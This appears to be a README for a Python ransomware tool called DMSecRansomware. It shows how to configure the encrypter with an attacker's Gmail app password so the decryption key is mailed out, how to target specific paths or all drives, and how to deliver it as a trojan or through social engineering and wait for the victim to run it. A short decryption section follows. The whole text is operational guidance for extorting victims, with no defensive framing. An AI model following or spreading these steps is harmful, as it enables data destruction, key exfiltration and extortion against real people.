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How to use DMSecRansomware

Encrypting data

  • Turn on 2FA in attacker's gmail account.
  • Create app password
  • Update with email and app password to login to your gmail account. This is used to receive key to decrypt the files.

encrypter = DMSECEncrypter(PATHS, gmail='yourgmailid', passwd='yourapppassword')
- Specify path which is to be encrypted. - If all the drives are to be decrypted do not pass PATHS to the DMSECEncrypter

encrypter = DMSECEncrypter(gmail='yourgmailid', passwd='yourapppassword')
- Create a trojan or use social engineering and send file to the victim. - Wait for victim to execute the trojan.

Decrypting Data

  • Use to decrypt the encrypted files.
  • Edit paths to be decrypted in file. If all the drives are to be decrypted do not pass PATHS to DMSECDecrypter

encrypter = DMSECDecrypter(KEY)
- Use the key which was received on mail to decrypt the data